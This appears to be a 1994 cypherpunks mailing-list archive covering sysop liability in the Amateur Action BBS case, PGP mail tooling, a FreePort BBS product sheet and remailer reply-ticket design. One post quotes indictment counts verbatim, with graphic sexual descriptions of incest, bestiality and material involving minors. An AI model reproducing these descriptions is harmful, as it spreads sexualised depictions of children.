
However, they made some nice T-shirts :-)

A more serious effort was done in the early 70s by the Minerva folks, who
built up an island out of coral reefs in the South Pacific (the UN tends
to require 1 foot above mean high tide to count as enough dirt to be a
country.) About six months later the Kingdom of Tonga invaded and stole
the place.

Bill

From mccoy at io.com Mon Dec 5 15:22:51 1994
From: mccoy at io.com (Jim McCoy)
Date: Mon, 5 Dec 94 15:22:51 PST
Subject: AA BBS - Thomases are going to jail...
In-Reply-To: <9412051130.1.17207@cup.portal.com>
Message-ID: <199412052321.RAA04665@pentagon.io.com>

> From: hkhenson at cup.portal.com
[...]
> By reaching out thousands of miles through cyberspace connections, the
> RR is using Federal power to suppress constitutionally protected
> activities which they find offensive.
[...]

After having spent most of Saturday at an EFF-sponsored workshop on sysop
liability and the law I will throw in a few bits of information passed on
at this event from real lawyers (Mike Godwin gave the "porno on the net"
talk and the AA case was highlighted in it, but all of the lawyers there
had interesting things to say about this situation.)

First of all, "obscenity" is _not_ constitutionally protected.
"Pornography" is protected if it meets several standards established in
various decisions of the Supreme Court, obscenity is that which does not
pass these standards. There are a lot of ways to get around the community
standards part of the test if the questionable bits have any artistic
merit, instructional or informational use, or do not simply appeal to
prurient interest. The "community standards" bit is the last line of
defense and the only one of much interest here.

> Most of you reading these groups are familiar with the AA BBS case.
>
> In a nutshell, a postal inspector in Memphis called Amateur Action BBS
> in California, downloaded a dozen files, ordered other stuff, shipped
> the sysop some unsolicited kiddy porn, then arrested the sysop (Robert
> Thomas) and his wife (Carleen) for kiddy porn and (by Memphis standards)
> obscenity.

This case is yet another example of bad fact leading to bad law. The big
problem here is that the sysops of this BBS were mailing out video tapes
to customers; while it may not be popular to criticize the current
net.martyrs of the month, the biggest reason they got busted is because
they were stupid.
The fact that they shipped the video tapes made it much easier for the
Memphis prosecutors to claim that they were involved in transportation of
obscene material to Tennessee. It also blew apart any claim they could
have made regarding the fact that the postal inspector connected to the
BBS and "pulled" the bits rather than having them "pushed" (e.g. he
initiated the transfer and the sysops were unaware of the
transportation...obscenity stuff does have some reliance upon knowledge of
the contents and upon the alleged perpetrator knowing that the shipment
was taking place) because they then went and shipped this video tape, an
action which could not have been done without their knowledge and in which
the transportation was caused by the sysop's action. It also meant they
could not claim that they were unaware of the final destination of the
bits. Morons.

On the upside of things relating to this case, it seems that their counsel
was rather inept, in fact the judge in this case "spoke from the bench"
and lambasted the AA couple's lawyer as being incompetent and completely
unable to handle the case. This will make it much easier for the couple to
appeal their conviction, as the judge's opinion of their counsel's
competency is now a matter of record.

> The Memphis jury found the sysop
> and his wife guilty of obscenity, but even they couldn't buy the kiddy
> porn charges, and acquitted on that charge.

The reason they were acquitted on the kiddie porn charge is that the law
enforcement officials acted too quickly. The envelope containing the
offending video tape of kiddie porn had been delivered the day of the
arrest and had not even been opened.

[...]
> Certainly *any* system which carries alt.sex.* is subject to the same
> treatment by the Religious Right (in the guise of the Memphis Feds) as
> AA BBS. In fact, the very .gifs that were found obscene in Memphis
> were made "freely distribute," by Robert and have been posted *many*
> times to the net.
Sorry, but "*any* system which carries alt.sex.*" is probably not
providing access to people from Tennessee, and even then the admins of
such a site can probably work their case to be closer to the bookseller
situation of not knowing the specific contents of the aforementioned
groups (the signal-to-noise ratio on those groups actually acts in the
admins' favor :) Additionally, all of the alt.sex.* groups are primarily
text, which is almost impossible to get an obscenity conviction on. There
apparently has not been a successful obscenity conviction on text in over
20 years and films are almost as hard to get a conviction on. The real
danger is in standard images, because the law requires the proof of
obscenity to be based upon the artistic merit of _the work as a whole_
which makes text erotica almost completely immune and film safer than
pictures.

In fact, the biggest danger most sites have is not from obscenity action
regarding the contents of alt.binaries.pictures.erotica.*, but from
copyright action regarding the contents of those groups. To nail someone
on copyright does not require them having knowledge of the copyright
status of the work (ignorance is no excuse in copyright cases.) There has
already been one case addressing this issue (Playboy v. Frenya [I think it
was Frenya, I can't remember exactly]) and the sysop lost.

You seem to have this big paranoia regarding the RR (who are actually
cypherpunk allies on many issues) which I will avoid discussing, but the
problem here is that you seem to think that the law in some way reflects
reality. It doesn't. Pick up a copy of "Cyberspace and the Law" [Cavazos
and Morin, ISBN 0-262-53123-2], read it, and then pass it on to other
sysops and sysadmins so that they know how to avoid doing something stupid
like the admins in the AA case. The best way to prevent something like
this from happening again is to make sysops and sysadmins aware of the
current law and how they can minimize their exposure.
At the conference Mike said that he was working on a listing of the
various obscenity standards that he could find for communities across the
nation, so admins will eventually be able to limit access to certain
subjects or newsgroups based upon the location of the user.

jim

From perry at imsi.com Mon Dec 5 15:51:47 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 5 Dec 94 15:51:47 PST
Subject: (Fwd) Re: GATT and RSA
In-Reply-To: <199412052041.AA00620@access3.digex.net>
Message-ID: <9412052350.AA06954@snark.imsi.com>

Peter Wayner says:
> I want to know whether GATT will affect the export of encryption
> software.

Doubtful. They would not have been so stupid as to back themselves into
that sort of corner.

.pm

From wcs at anchor.ho.att.com Mon Dec 5 16:09:43 1994
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 5 Dec 94 16:09:43 PST
Subject: Authentication at toad.com: WTF?
Message-ID: <9412051922.AA04176@anchor.ho.att.com>

Hmm, yes, using agents for security verification seems reasonable; if
you've got a legal relationship or other sufficient trust. It does also
require an adequate communication path between you and your agent - on the
incoming side so you know that the message the agent verified is the
message you're seeing (e.g. the agent's signature on the message, plus
potentially some check to make sure all the messages get delivered), and
on the outgoing side to make sure your agent gets your messages correctly.

Bill

From wcs at anchor.ho.att.com Mon Dec 5 17:00:20 1994
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 5 Dec 94 17:00:20 PST
Subject: Interoperability, one-use remailer tickets
Message-ID: <9412051953.AA04836@anchor.ho.att.com>

Mike Ingle suggests adding a one-shot reply capability to the remailers,
to discourage hit-and-run abusers by allowing replies to them. The reply
token would become invalid after either one use or timeout.
One problem with this approach is that, if the sender is on the mailing
list / newsgroup that the message is sent to, he can use up the one-shot
reply himself if he's quick, by being the first one to reply. It's also
somewhat difficult to design a system where the one-shot replies would
chain.

Non-automatic non-mandatory one-shot replies are more useful, since there
are times you may want to get replies.

Bill

From roy at cybrspc.mn.org Mon Dec 5 17:46:42 1994
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Mon, 5 Dec 94 17:46:42 PST
Subject: Tim May is RIGHT!!!
In-Reply-To: <199412020705.XAA07308@zero.c2.org>
Message-ID: <941205.180539.5I0.rusnews.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, nobody at c2.org writes:

> I'm sorry I can't say so under my real name, but I

Heh, heh... Detweiler meets McElwaine.

Stop making me laugh, Larry. My lips are chapped.

- --
Roy M. Silvernail -- roy at cybrspc.mn.org
"I'm a family man, model citizen."
-- Warren Zevon

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From adam at bwh.harvard.edu Mon Dec 5 18:49:21 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 5 Dec 94 18:49:21 PST
Subject: fixed code
Message-ID: <199412060248.VAA04314@bwh.harvard.edu>

The procmail stuff I sent yesterday was slightly broken.
It seems that keyservers respond well to 'mget 36E61FB1', but not
'get 36E61FB1'

To auto retrieve keys, use these two procmail recipes:

# auto key retrieval
:0BW
* -----BEGIN PGP
KEYID=|/usr3/adam/bin/sender_unknown

# I have an elm alias, pgp, points to a keyserver
:0ac
|elm -s"mget $KEYID" pgp

sender_unknown

#!/bin/sh
# sender_unknown returns a keyid, exits 1 if the key is known
OUTPUT=`pgp -f +VERBOSE=0 +batchmode -o /dev/null`
echo $OUTPUT | egrep -s 'not found in file'
EV=$?
if [ $EV -eq 0 ]; then
    echo $OUTPUT | awk '{print $6}'
fi
exit $EV

From sleas at d.umn.edu Mon Dec 5 19:42:16 1994
From: sleas at d.umn.edu (shawn leas)
Date: Mon, 5 Dec 94 19:42:16 PST
Subject: PGP-ELM????
Message-ID: <199412060339.VAA02118@ub.d.umn.edu>

I've successfully downloaded and compiled pgp-elm, but notice no
differences between it and the original. What's the deal??? How do you
use it???

X-man

From adam at bwh.harvard.edu Mon Dec 5 20:04:57 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 5 Dec 94 20:04:57 PST
Subject: PGP-ELM????
In-Reply-To: <199412060339.VAA02118@ub.d.umn.edu>
Message-ID: <199412060403.XAA04759@bwh.harvard.edu>

You wrote:

| I've successfully downloaded and compiled pgp-elm, but notice no
| differences between it and the original. What's the deal??? How do you
| use it???

elm -p. Note that it sends the mail instantly after you sign or encrypt
it. I found I prefer the 'do you want to sign' system; amongst other
things, it allows you to do chaining with addition of text after each
encryption, add a note outside the PGP armored file, etc. There's a lot
of read the source involved.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From skaplin at skypoint.com Mon Dec 5 20:57:43 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Mon, 5 Dec 94 20:57:43 PST
Subject: Freeport information
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

- -------- Forwarded message --------
Date: Mon, 5 Dec 1994 12:11:58 -0500 (EST)
From: Michelle Montpetite
To: skaplin at mirage.skypoint.com
Subject: Freeport

Here is the information you requested on Freeport software.

Sincerely,
Michelle Montpetite

******************************************************************************
*Michelle Montpetite          E-MAIL: Michelle at Americast.com              *
*Account Manager              PHONE : (216) 498-5100                         *
*American Cybercasting        FAX   : (216) 498-5101                         *
*                             http://www.americast.com                       *
******************************************************************************

FreePort Version 2.3
Product Overview
Case Western Reserve University

FreePort provides a simple, extensible, menu driven bulletin board system
for Unix BSD systems. FreePort is designed to be used by people with
little or no knowledge of computers yet still provide all of the benefits
of today's powerful, computer based information systems. The more
sophisticated computer users may bypass some of the basic functions of
FreePort in order to streamline their access. In this way FreePort is
adaptable to users of all levels of expertise.

Features

Accessible from any asynchronous terminal or microcomputer

Except as noted here, all functions are available from any asynchronous
terminal or any computer with terminal emulation software. If the user's
terminal has intelligent cursor-control, FreePort supports full-screen (in
addition to line) editing and cursor-based selection of menu items.
Support for some devices may require editing of a configuration file. File
transfers require the user to have a computer.

Menu interface

The menu interface presents information and FreePort functions as a
hierarchy of menus. Menu selection is the user's basic navigation tool.
Commonly accessed menus may be assigned aliases for direct jumping to the
desired menu. Some system-wide functions, including context-sensitive
on-line help are available from any menu. Your system administrator
defines the individual menus and linking among menus to correspond to your
view of your information. Selecting a menu item launches the menu or Unix
program associated, by that menu, with that item.

User Profile

Access rights are configurable by user group. Anonymous users have
read-only access (e.g. they cannot post to the bulletin boards nor send
e-mail); registered users have full normal access; and authorized
bulletin-board operators have additional privileges to manage the portions
of the information hierarchy delegated to them. Additional privileges may
be defined by your system administrator.

Each registered user has an electronic mail address and mailbox, a
modifiable user profile, and a disk work area. Portions of the profile
(e.g. name, e-mail address, and interest keywords) are searchable by other
FreePort users. The work area is for temporary storage of files saved from
the bulletin board, mail, and file transfer systems.

Electronic Mail

Users may send (and receive) electronic mail to other FreePort users. If
the system is connected to a TCP/IP network, electronic mail extends to
any user at host reachable through that network. Mail is received into the
user's private mailbox. Users may browse the mailbox at their leisure
--searching for or selecting messages to read, search, save, delete, or
forward. Messages may be composed using one of the built-in text editors
or uploaded from the user's computer.

Bulletin Boards

A bulletin board is much like a public mailbox. It is often used to
implement a discussion group as well as the electronic equivalent of the
traditional corkboard. Every user may read and save a copy of, but not
modify, existing messages on the bulletin board. Users may post their own
messages through an e-mail-like interface.
On an open bulletin board, posted messages immediately appear for reading
by all. On a moderated board, posted messages are first filtered by a
human moderator who may post to the actual bulletin board. For each user,
the system remembers which messages on each bulletin board he has read (or
marked as read).

Multi-user Chat

Users may interactively chat with others on chat areas analogous to CB
radio channels. The chat system moderates and distributes the
contributions of each to the others on the channel.

Voting

Authorized users may post issues for voting by the user community. An
issue posting defines the issue text to be presented to users, and the
predefined and/or free formatted answers allowed. Users may go to the
voting area, select an issue, and vote through a bulletin board like
interface. The system maintains running tallies which may optionally be
displayed.

File transfer

A user may send files to other FreePort users, upload/download files to
his computer using the Kermit or {XYZ}Modem serial line protocols, and
transfer files to/from systems on a TCP/IP network using FTP.

Gateway to other systems on a network

If the FreePort system is on a TCP/IP network, "padded cell" versions of
Telnet and ftp provide user connections to external administrator-selected
service systems (including other FreePorts) on that network.

Miscellaneous

Other features include a text file viewer, a simple database system,
system usage logging, an automated address taker, session time limits, and
a function to get a list of on-line users.

Interoperable with other systems

FreePort is designed for maximum interoperability with other internet
information resources. It utilizes popular publicly available layered
products to implement the underlying communications services. Thus it is
compatible today and will interoperate as these layered products evolve to
use new standards.
The layered products and standards include:

* The Berkeley Unix sendmail, or compatible
* C-News bulletin board service and various library routines written at
  the University of Toronto
* Internet Relay Chat server written at University of Oulu (Finland) and
  client written at Boston University
* Kermit serial file transfer service written at Columbia University
* Telnet, ftp and various library routines written at the University of
  California

FreePort is configured to run on a single computer system containing the
above layered products. Installation by knowledgeable Unix Systems
Programmers in a distributed computing services environment of multiple
computer systems is possible, though not supported.

Extensible

The programs provided give you the tools needed to set up and run a simple
bulletin board system. Without modifying any source code or recompiling
any programs, you can expand the BBS as far as your imagination (and
system resources) permit. The BBS software uses Ascii files and any
available Unix programs to build a system that you can modify and expand.
Menus can be updated and new sections added to the running system without
interrupting service.

System Prerequisites

Hardware Prerequisites

User access ports

You must provide some way for your users to access the system. FreePort
will work with any method (e.g. modems, serial lines, and remote login)
which establishes a login session to your FreePort service system.

Network connection (optional)

If your FreePort system is connected to a TCP/IP network, you may
participate with other information services on that network. Examples
include: e-mail, file transfer, other FreePort systems, Usenet bulletin
boards, remote data feeds, and remote login.

Disk space

You will need disk for your host Unix operating system and utilities,
program maintenance, electronic mail queues, bulletin boards, user
mailboxes and work areas, and the information files that you make
available to your users.
Disk space requirements are dominated by the data that you wish to keep
on-line.

* Installation and maintenance of FreePort and its prerequisite programs
  requires about 60MB.
* Mail queue and bulletin board space depend on your anticipated e-mail
  traffic and the amount of information that you wish to retain in
  bulletin boards. Cleveland Free-Net runs the FreePort software and
  currently retains about 1000MB of bulletin boards alone.
* Mailboxes and user work areas are quota controlled. You might use 100KB
  per user for an initial estimate.

Performance

FreePort runs on workstation or larger Unix systems. Performance of your
system depends on the type of information services that you provide and on
the nature of your clients' use of the system. We have found the following
configurations to be satisfactory for the CWRU and Cleveland Free-Net user
communities.

    IBM RT/115 with 8MB memory serving 10 simultaneous users
    IBM RT/135 with 16MB memory serving 24 simultaneous users

Software Prerequisites

Operating system

FreePort is dependent on Unix BSD 4.3 features. It does not currently run
on System 5 R3, AIX, or compatible systems. Operating systems that
FreePort is known to run under include SunOS 3.5 or newer, DEC Ultrix 3.0,
and IBM/4.3.

Prerequisite software

FreePort is distributed in source code. You will need typical Unix program
development tools including a C compiler, yacc, and linker. The publicly
available layered software mentioned above is available from various ftp
sites on the internet, or is available from CWRU as a complete collection
of the prerequisite source code.

Support staff

Depending on the size of your planned system, support staffing may vary
from one to several full-time staff. Most of the effort in operating
FreePort goes to the management of information sources and users. Staff
functions include technical support, operations, administration, and user
support.
Installation and maintenance of the FreePort software requires an
experienced Unix Systems Programmer. The technical support person requires
'root' access to install and configure the various prerequisite
communications software.

The system runs with little or no operator intervention. The major
operations duty is filesystem backups.

System administration duties include architecting the menu hierarchy,
installing new menus, authorizing new Sysops and adding users,
coordinating Sysops, and arbitrating usage conflicts. The Cleveland
Free-Net, for example, has over 400 volunteer Sysops who each husband a
delegated information area in the system.

More Information

Try it out.

If you would like to see what FreePort can do, you may connect to the
Cleveland Free-Net any time of the day or night. The Cleveland Free-Net is
running FreePort plus some experimental extensions which may appear in a
future release. The modem pool phone number is (216)368-3888. If you have
internet access, you may telnet to one of the following addresses (the IP
addresses may change without notice):

    node name                IP address
    freenet-in-a.cwru.edu    129.22.8.82
    freenet-in-b.cwru.edu    129.22.8.75
    freenet-in-c.cwru.edu    129.22.8.76

The system will invite you to become a registered user. You may "explore
the system" as a visitor, or you may apply to be a registered user so that
you can send mail, post messages and participate in the chat areas.

Licensing

A 5-year renewable FreePort 2.3 license for a nonprofit site is $850
($2800 for-profit). The software is shipped as a "tar" file on 8mm Exabyte
cartridge, or for extra cost, on 1/2" magnetic tape or DC6150 cartridge.
The software is AS IS. Additional consulting services are available, as
needed, from the American Cybercasting Corporation (separate Fee
Required).

For the license agreement and other information contact:

American Cybercasting Corporation
P.O.
Box 575
Aurora, Ohio 44202
Phone: (216) 247-0770
FAX: (216)247-0778
Internet: USA at AmeriCast.Com

Unix is a trademark of AT&T

###

==============================================================================
There is only one honest impulse at the bottom of Puritanical religion, and
that is the impulse to punish the man with a superior capacity for happiness.
--H. L. Mencken--
==============================================================================
skaplin at skypoint.com                   | "...vidi vici veni" - Overheard
                                         | outside a Roman brothel.
PGP encrypted mail is accepted and       |
preferred.                               | Change is the only constant in the
                                         | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or  |
Finger skaplin at mirage.skypoint.com    | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

This message digitally signed to verify the identity of the writer.

From edkelly at INS.INFONET.NET Mon Dec 5 21:12:59 1994
From: edkelly at INS.INFONET.NET (ED KELLY)
Date: Mon, 5 Dec 94 21:12:59 PST
Subject: AABBS Conviction relation to child porn?
Message-ID: <0098881E.4950521B.51@INS.INFONET.NET>

There is hoopla over the convictions of those who ran the Amateur Action
BBS. The actual charges involve stuff that sounded like it was intended to
be distributed as child pornography.
The indictment described the offensive material being destributed as follows in each count: COUNT 1: CONSPIRACY TO VIOLATE FEDERAL OBSCENITY LAWS BY DISTRIBUTING OBSCENE MATERIALS (see following) -------------------------- COUNT 2: "AA-8589.GIF" described as "SHE SUCKS HER SON'S COCK! FATHER IS FUCKING HIS DAUGHTER !" -------------------------- COUNT 3: "AA-8278.GIF" described as "FULL SCREEN VIEW! A HAIRLESS PUSSY NAILED TO A TABLE!", "AA-7153.GIF" described as "MOTHER IS WATCHING HER DAUGHTER FUCK BIG COCK! NO TITS!", "AA-8682.GIF" described as "HE MAKES HIS DAUGHTER SUCK COCK! SHE IS FISTING HER SISTER!", and "AA-11935.GIF" described as "HE FUCKS HIS DAUGHTERS HAIRLESS CUNT!" SHE FISTS HER MOTHER!" -------------------------- COUNT 4: "AA-15198.GIF" described as "BLONDE LOLITA HAS NO TITS! SUCKS HUGE COCK AND DRINKS SPERM!" ------------------------- COUNT 5: "AA-13216.GIF" described as "PUSSY PENETRATION! HORNY BRUNETTE GETS FUCKED BY A HORSE!" ------------------------- COUNT 6: "AA-13517.GIF" described as "HORNY BLONDE JACKS OFF HORSE! HORSE CUM ON HER HANDS!"', "'AA-13521.GIF" described as "CLOSE-UP! BIG HORSE COCK IN HER CUNT! HORSE CUM ON HER LEG", and "AA-16587.GIF" described as "'SHE SUCKS THICK DOG COCK! DOG SPERM ON HER LIPS AND CHIN." -------------------------- COUNT 7: "AA-17623.GIF" described as "YOUNG ASIAN HAS A THICK CLIT! DRINKS PISS FROM AN UNCUT COCK!" -------------------------- COUNT 8: . . . used an express company and common carrier, United Parcel Service (UPS), for carriage in interstate commerce from California to Tennessee an obscene video cassette tape -------------------------- COUNT 9: . . . used an express company and common carrier, United Parcel Service (UPS), for carriage in interstate commerce from California to Tennessee obscene video cassette tapes -------------------------- COUNT 10: . . . 
used an express company and common carrier, United Parcel Service (UPS), for carriage in interstate commerce from California to Tennessee obscene video cassette tapes -------------------------- COUNT 11: . . . shipped in interstate commerce by means of the United States Mail, visual depictions, the production of which involved the use of a minor engaging in sexually explicit conduct, . . . involving (three (3) magazines, bearing titles of "Little Girls Fuck Too!", "Lolita Colour Special 6" and "Lolita Color Special 18" -------------------------- COUNT 12: FORFEITURE ALLEGATIONS involving any instrumentalities of committing crimes. The Grand Jury voted to charge the defendants with all of the above crimes. The trial jury, did not convict the defendant of the one count charging child pornography -- perhaps because it was never proved that the defendants opened it (see Count 11). Although the convictions of the defendants in the Amateur Action BBS case were not technically for violation of federal child pornography laws, if the defendant's own descriptions of their wares is correct, I think the jury might have convicted them because of the apparant inclusion of children in their materials. People do not need to feel bad about convictions of those who peddle depictions showing children in sex acts. Reasonable people may disagree about important issues. But, I do not feel protected speech or electronic communication was endangered by the defendants' shipment and sale of their described materials. ED KELLY From hfinney at shell.portal.com Mon Dec 5 21:42:32 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 5 Dec 94 21:42:32 PST Subject: Interoperability, one-use remailer tickets In-Reply-To: <01HK8FKNB3LE90PJWN@delphi.com> Message-ID: <199412060542.VAA11700@jobe.shell.portal.com> Mike Ingle writes some very nice ideas about remailers: >The remailers need a one-time reply mechanism. 
>This would enable many other things, including "persistent" anonymous >entities, without using broadcast techniques. The current remailers >encourage hit-and-run anonymity, like the recent burst of anonymous >nastiness, and discourage conversational anonymity and persistent >anonymous entities. Sending a one-way message is easy and fairly secure. Bill Stewart pointed out some of the problems with one-shot reply addresses, although he seemed to be analyzing them as features which the remailers provided against the users' will. I think Mike's idea was that this is something which remailer users would like. Still, Bill's comments seem valid. How useful is a single-use reply address? If you posted a message to a mailing list or newsgroup only the first person would get through to you. You could post a message with a list of reply addresses but that would open up some traffic analysis problems. Two people having a conversation fits this model somewhat well, with each person sending a new reply address that can reach them with each message. But even in this case how often is there a strict alternation of messages? Perhaps a "one ahead" approach would work, where each person at all times has either one or two addresses which will get through to the other side as long as they are in "alternation mode". Then when one person needs to get a message to the other out of turn, he uses up his spare address. Then he gets sent two new addresses in the reply message since now he has none, and they are back in the initial state. >One way to do this: each remailer has a list of secret (symmetric) keys. >Each secret may have an expiration date. By some method (problem discussed >later) the user and the remailer establish a shared secret, adding it to the >list, while the remailer does not find out who the user is. The reply ticket >contains a series of nested hops, each encrypted with that remailer's secret >plus all the others after it. 
>When the ticket is used, the remailer decrypts one layer of the ticket to >obtain the next hop. It then encrypts the message with that secret key. Now >it forgets the secret key (poof!) and passes the message and remainder of >the ticket on to the next remailer. >The ticket is getting decrypted at each hop, and the message is getting >encrypted. Thus there is nothing recognizable between hops, and the trail is >burning up as the message propagates. At the terminal end, the recipient >applies all of the secret keys in the proper order to decrypt the message. >Of course, an additional end-to-end public-key encryption is also an option. As you have seen, this model is very similar to Chaum's 1981 paper except for where the secret keys come from. This is not to disparage your ideas but it's just that as long as we have giants around, we might as well stand on their shoulders. Chaum's system was considerably simpler as it used ordinary PK decryption of the address at each stage, with the header including a secret key that would encrypt the body to maintain unlinkability. As you point out this has a certain kind of vulnerability to coercion that your scheme is less sensitive to. >The catch: how do we establish a shared secret with the remailer, without >identifying ourselves to it? If the first remailer (the one the replyer >sends the ticket to) is corrupt, and it knows who established the secret >contained in the ticket, it knows the end-to-end path of the message. >Solution 1: each remailer has a public key. To establish shared secrets with >a series of remailers, you send a normally-chained and nested message, using >each remailer's public key. Each remailer decrypts a layer, stores the >secret contained for it, and passes the message on. The first few remailers >may not get secrets; they are just there to anonymize the message. > Problem: secret-establishing message is replayed, setting trail back up, > then reply ticket is replayed. 
Solution: when a secret is used, it is > one-way hashed, the hash stored, the secret forgotten. Secrets which have > already been used will not be accepted the second time. When the used > secrets list gets full, a new public/secret pair is generated and the old > one is forgotten, preventing any more replays. Chaum too used a list of message hashes, although his use was to prevent the reply-replay attack. I will note that this attack is going to be pretty difficult to mount on your scheme as it would require either saving all messages from a suspected target of an anonymous address, or saving all messages into the remailer network in toto, then perhaps playing (all of?) them back. So it is not going to be easy to set up this chain again. In addition to your idea of hashes you could use some time limits to restrict this kind of reply attack. > Problem: remailers are coerced or hacked to decrypt a captured secret- > establishing message, before the secret key is expired. Trail of a reply > ticket can then be followed. Solution: no good one that I can think of. Yes, this is the kind of coercion that as you point out the Chaum scheme is vulnerable to. There we rely on the remailers to not send two messages to the same one-shot address in order to prevent replay attacks. But as long as the remailer key is valid there is the chance that the remailer could be coerced and forced to decrypt your anonymous address, allowing it to be traced back to you. I do think that your scheme is less sensitive to this kind of coercion because of the difficulty of knowing which message to ask the remailer to decrypt. Ironically, your scheme is even stronger than "forward" messages through the remailer network. Those are equally vulnerable to this kind of coercion. If a suspect sends a message through the remailer network, it can be replayed in just the way that we are worried about for Chaum replies, and the remailers coerced into decrypting it at each step. 
We tend not to worry so much about this forward vulnerability as we do about the reverse one. Partially this is because our current remailers don't implement Chaum's scheme, but partially too we sense that an interesting public pseudonym is a more inviting target than the hopefully anonymous true name behind it. I'm not really sure how good an assumption this is, though. So I am less inclined to view Chaum's scheme as broken since the remailer network inherently suffers the same vulnerabilities. We hope to develop enough independent remailers that the coercion issue will not be a major problem. Tim May has advocated hardware, tamper-proof circuits to hold the keys so that coercion is impossible. Plus, I think an important part of the picture which is not currently being implemented is remailer key changes. This can provide forward secrecy similar to your scheme. Once last week's key is gone, there is no longer any danger of your message ever being traced (as long as you trust the remailer to truly erase it, just as in your scheme). This would be useful both for ordinary remailing and for Chaum-style reply blocks, which as I say are both vulnerable to the reply-with-coercion attack. There is one attack on all these schemes which you didn't mention, which is that the bad guys are the first one to try the return address and coerce each remailer along the way. This might be especially dangerous in the case of your "pigeonhole" described below, where the pigeonhole account makes for a tempting target for the snoopers, giving them a chance to intercept the reply message back to you and be the first ones to be using it. >Solution 2: establish a shared secret by a simple, direct Diffie-Hellman >exchange with the remailer. You send a public-piece in a message, remailer >sends you a public-piece, both sides compute the secret. If the remailer is >corrupt, it now knows who you are. This is a level-1 secret. 
>Use the level-1 secret as a reply ticket to establish a secret with another >remailer. Message goes through a remailer, to the target you want to >establish a secret with. Target replies using the level-1 secret. This is a >level-2 secret; two remailers have to be corrupt to trace this secret to >you. If you want, use the level-2 secret for another exchange to create a >level-3 secret, and so on until your comfort zone is reached. An automatic >program sits around stockpiling secrets for you. Problem: high bandwidth. >Does anyone know of a better way to establish a shared secret in an >untraceable way? Both of these methods have their problems. That is a very nice idea for using DH. Here is a variant which might use less bandwidth. Have each remailer create a lot of DH key halves, values of hi = g^xi so xi is the secret discrete log of the public DH key half hi. All these hi get published. Now you need to reserve one for yourself to use in your return ticket, which you do perhaps with an ordinary remailed message to that remailer as in your first solution. You create a random y and use hi^y for your secret key for that remailer. The reply block contains i and g^y which lets the remailer calculate the same secret. Then it deletes xi when it gets used so you get the forward secrecy you desire. This is not subject to the reply attack you were worried about because all you told the remailer was i, and xi is gone for good so they can't re-create the secret. (Equivalently, have the remailers create lots of public keys and publicize them, and reserve one in the same way. Then have the remailer erase the secret key when it gets used. This is just another way of describing the above.) >Given a secure two-way messaging mechanism, persistent anonymous identities >are established using a "pigeonhole service". This is a service, with a >publicized address, that will accept public-key encrypted mail and store it >in a "pigeonhole". 
The owner of the pigeonhole anonymously sends a request >(with authentication) and a reply ticket. The pigeonhole service sends the >owner his mail using the ticket. This is a good idea, although there is a tradeoff between frequent polls of the pigeonhole, which might allow some traffic analysis particularly if there is a suspected link between persona and true name, and less frequent checks, which may cause high priority messages to be delayed. >Anonymous users would need a client that could set up trails, create >tickets, request mail from the pigeonhole, etc. One nice feature of the >system is that non-anonymous users could talk to anonymous users without >having a client. The anonymous message would be of the form: >--- BEGIN REPLY TICKET (LEAVE AT HEAD OF REPLY) --- >(Reply ticket ciphertext) >--- END REPLY TICKET --- >Message text >The non-anonymous user could reply with any mail reader, send the message >back to the remailer that sent it to him, and the message would be >transported securely back to the anonymous user that sent it. Yes, well, we do this already with our current remailers. Many people have written clients to create these reply blocks, along with little instructions to the baffled recipient to cut and paste the reply block at the front of the reply message. Once in a while these even work, I think. With your pigeonhole idea you don't need this, you can just have a Reply-To that points at the pigeonhole, which is one of its biggest advantages. >For reliability in a large remailer network, end-to-end reliability is >better than point-to-point reliability. Messages should be m-of-n secret >shared before transmission, and reassembled at the terminal end. For >clientless reception, the terminal node remailer could do the reassembly >and splitting of replies. I agree with this. This also relates to the issue of message size quantization with cryptographically strong padding. I don't suppose the RSAREF library could do that... 
>Code for secret sharing is available, but most secret-sharing algorithms >create shadows each the size of the message. This can be avoided: use an >error correcting code to add enough information to the original so the >message can be recreated with any m of n pieces. Break into pieces, encrypt >each piece, and secret-share the key. Yes, this is a good idea. I first read about this in the 1993 Crypto conference proceedings, in a paper called "Secret Sharing Made Short" by Hugo Krawczyk. You might find the paper useful although it sounds very similar to what you have in mind already. Considering all the pros and cons, I am afraid that even the security of the one-shot return address is probably insufficient, especially when the simple "post replies to usenet encrypted with this key" is so easy and safe. Granted it will be a problem once everybody starts doing that, but flooding is going to be hard to beat for safety. Hal From ktk at syzygy.com Mon Dec 5 22:26:25 1994 From: ktk at syzygy.com (KT Kislitzin) Date: Mon, 5 Dec 94 22:26:25 PST Subject: Dec. 10th Bay Area Cypherpunks Meeting Message-ID: <199412060628.WAA07448@syzygy.com> ANNOUNCEMENT ============ This month's Bay Area Cypherpunks Meeting will be held this Saturday, December 10th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris (same cypher time, same cypher channel...). The topic for this month's discussions is: Technical Cryptography We have three speakers planned. Susan Langford will speak on Cryptanalysis of DES and Other Block Cyphers. She will be speaking generally on the subject, and will discuss her work on Differential Linear Cryptanalysis of DES. Susan is working with Martin Hellman at Stanford University. Raph Levien will present ``The Security of Cypher Block Chaining'', a paper from Crypto '94 by Mihir Bellare, Joe Kilian, and Phillip Rogaway. Raph is working to infect all mail user agents with PGP. 
